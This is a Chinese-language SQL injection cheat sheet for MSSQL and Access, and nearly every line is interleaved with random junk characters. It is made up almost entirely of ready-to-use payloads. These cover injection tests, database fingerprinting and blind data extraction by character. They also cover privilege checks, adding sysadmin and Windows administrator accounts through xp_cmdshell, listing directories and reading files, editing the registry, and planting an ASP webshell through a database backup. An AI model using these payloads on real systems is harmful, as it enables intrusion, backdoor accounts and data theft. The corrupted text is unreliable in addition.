1.判断是否有注入;and 1=1 ;and 1=2 (CAkzgT�fc
2.初步判断是否是mssql ;and user>0 ��lAGntYv
+x~p&,�w?
3.注入参数是字符'and [查询条件] and ''=' 0o�q��O��X
Jg�V4-B0
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 9hJ
� a� K
APCE�}%�1U
5.判断数据库系统 C^�:��{�y
~4xn�^��.w
;and (select count(*) from sysobjects)>0 mssql ID<�[=es6�
KTeR;6oZn"
;and (select count(*) from msysobjects)>0 access w�@\4f�t6d
kL��<HG�Qt
8A�u W>7_�
D �u_�;!�E
6.猜数据库 ;and (select Count(*) from [数据库名])>0 yQ&C]{>�TS
(`R
heEg@f
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 &!FI!T
-WH
}FX��:sa?5
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �.B'ws/%5\
m�/< ��@Qw
9.(1)猜字段的ascii值(access) Pu��'NS�NT
;�*d?�Qe�:
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 sLSH`Xy?5
;wZp�lVB7y
(2)猜字段的ascii值(mssql) xlh�<}V�tp
K~fWZ�T�3]
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 l%��qh�^�0
��&'?Hh(��
10.测试权限结构(mssql) - rI4_D�l�
�~����D`�
D�r"PS�
>.
H29�vuGQjq
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- k7(lw�EgNG
�w{4��#Q�[
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- x&$�8;2�&.
Digx�#'#jf
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
�!�FvL2�L
� RcZ&�/MY
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- WHu[A/##']
JIf.d($
~:
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ��8�~O0�P=
J~h9i=4<bF
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- O5:[]vIn�
Y^XZ.����R
;and 1=(select IS_MEMBER('db_owner'));-- O:8Ne*L`D�
e+?;Dc-SJ\
omT�^�jh�
lg{M��\
+�
11.添加mssql和系统的帐户 u)%/df qzZ
L �D%SL�J:
;exec master.dbo.sp_addlogin username;-- �7&(h_}��Z
;exec master.dbo.sp_password null,username,password;-- t�q�L2' (=
���N{6�-a
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 9"�}5jq4*�
}}oIZP\q�M
;exec master.dbo.xp_cmdshell 'net user username password "
BU4\Q�F-
(�-�@I'CFd
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- K�H�M,lj*
SPau�no <M
;exec master.dbo.xp_cmdshell 'net user username password /add';-- v|@�EuN14<
�jY ;Hdb''
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- $^YH�y�f�h
�cqcH�1aSv
��'�>T�hn{
n�8FIx�l&u
12.(1)遍历目录 �:w7?]y6~S
��F|��P?|�
;create table dirs(paths varchar(100), id int) r&~�]�6
U�
Q@�*�9�|6-
;insert dirs exec master.dbo.xp_dirtree 'c:\' ?!��3u�?Kd
O8-Z �>��;
;and (select top 1 paths from dirs)>0 ^KV:.�up6
�l�XD=uRCI
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) //bQD�>NBO
4~�h��P25q
mqY=��N~/O
�gb}ov*��*
(2)遍历目录 }�^��*`&Lh
qV-1aaA�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- u��X6rCokr
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �&��
�sXMB
sX�Y�{g0%�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 o�?����aF�
g`�`��S SU
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 c4bv�Jy��8
7O��i�<_b
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �gyU�=v{].
+KOhD�tLMG
X9rao ���n
'"��h}l�`�
13.mssql中的存储过程 _<?�z-K_;I
T�^ #��1T$
xp_regenumvalues 注册表根键, 子键 Pu�'lp
�O�
6H0a�H�CM�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ��V8Z@y&ny
� �l� .m #
xp_regread 根键,子键,键值名 V=Z�%y$1Bc
EH'eyC-�B<
;exec xp_regread ^__�P;Gr�`
Q�JI]@3
�Y
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 EE�vi_Z932
HaF&o�oI5+
xp_regwrite 根键,子键, 值名, 值类型, 值 !lp7�}[k<y
q35=_'\��W
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 Vq��^�b_^�
yP�34�h*0B
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ��v7�@�*dg
{&�FOa'b�P
xp_regdeletevalue 根键,子键,值名 r>rL�[`p(2
]#�r��N�z"
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ^Gi�WU �+`
@sc�SW�5�+
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ?gjkgCbC#
ler$�HA%F]
W�~s:SN���
dE�3M� ��
14.mssql的backup创建webshell M�v:\�T�%]
`*i�:��z�'
use model �r'�@7aT&_
b�Kh}Y`���
create table cmd(str image); � ft��!D2M
�<<�9|*T�z
insert into cmd(str) values (''); )���[=C@U
{l\Ep=O vx
backup database model to disk='c:\l.asp'; -:�Q�"aeC5
Wq<H��sJd/
�y�"H(F,(N
%-|$7?�~��
15.mssql内置函数 ��G�+m�[�W
��V��Y@`�)
;and (select @@version)>0 获得Windows的版本号 %d�
/]8uO�
.4y44: �T
;and user_name()='dbo' 判断当前系统的连接用户是不是sa JYLAu�4s6
C�t�k1\quz
;and (select user_name())>0 爆当前系统的连接用户 �,,?�X�Gx�
��p.,`3"C1
;and (select db_name())>0 得到当前连接的数据库 P|a|4Bb+fW
d-��I=x�pB
�D8b9�T.[(
*�#GX�~3�A
16.简洁的webshell H8E#r*�"-m
q{!ft9|K\d
use model �?` 2z8uD/
7b�R[.|T��
create table cmd(str image); i3>_E� <"9
`J;g�~�#/k
insert into cmd(str) values (''); �1TgD�;qX�
+77�j2W_0�
backup database model to disk='g:\wwwtest\l.asp';
